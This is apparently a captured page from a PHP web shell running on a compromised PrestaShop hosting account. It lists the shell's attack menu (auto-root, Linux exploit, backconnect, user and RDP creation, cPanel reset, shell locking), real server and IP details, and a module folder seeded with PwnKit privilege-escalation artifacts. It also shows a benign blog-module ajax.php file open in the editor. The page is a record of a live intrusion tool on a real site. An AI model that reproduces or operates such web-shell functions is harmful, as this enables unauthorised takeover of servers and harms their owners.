Linux webm004.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.4 | : 216.73.216.104
Cant Read [ /etc/named.conf ]
7.4.33
alinaousgg
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
alinaousgg /
newmed /
modules /
ph_simpleblog /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
controllers
[ DIR ]
drwxr-xr-x
covers
[ DIR ]
drwxr-xr-x
covers_cat
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
featured
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
galleries
[ DIR ]
drwxr-xr-x
init
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
mails
[ DIR ]
drwxr-xr-x
models
[ DIR ]
drwxr-xr-x
translations
[ DIR ]
drwxr-xr-x
upgrade
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
views
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
ajax.php
1.28
KB
-rw-r--r--
changelog.txt
12.75
KB
-rw-r--r--
config.xml
580
B
-rw-r--r--
config_fr.xml
593
B
-rw-r--r--
index.php
1.24
KB
-rw-r--r--
logo-big.png
39.41
KB
-rw-r--r--
logo.png
4.91
KB
-rw-r--r--
ph_simpleblog.php
31.8
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ajax.php
<?php /** * Blog for PrestaShop module by Krystian Podemski from PrestaHome. * * @author Krystian Podemski <krystian@prestahome.com> * @copyright Copyright (c) 2008-2019 Krystian Podemski - www.PrestaHome.com / www.Podemski.info * @license You only can use module, nothing more! */ include dirname(__FILE__).'/../../config/config.inc.php'; include dirname(__FILE__).'/../../init.php'; $status = 'success'; $message = ''; include_once dirname(__FILE__).'/ph_simpleblog.php'; include_once dirname(__FILE__).'/models/SimpleBlogPost.php'; $action = Tools::getValue('action'); switch ($action) { case 'addRating': $id_simpleblog_post = Tools::getValue('id_simpleblog_post'); $reply = SimpleBlogPost::changeRating('up', (int) $id_simpleblog_post); $message = $reply[0]['likes']; break; case 'removeRating': $id_simpleblog_post = Tools::getValue('id_simpleblog_post'); $reply = SimpleBlogPost::changeRating('down', (int) $id_simpleblog_post); $message = $reply[0]['likes']; break; default: $status = 'error'; $message = 'Unknown parameters!'; break; } $response = new stdClass(); $response->status = $status; $response->message = $message; $response->action = $action; echo json_encode($response);
Close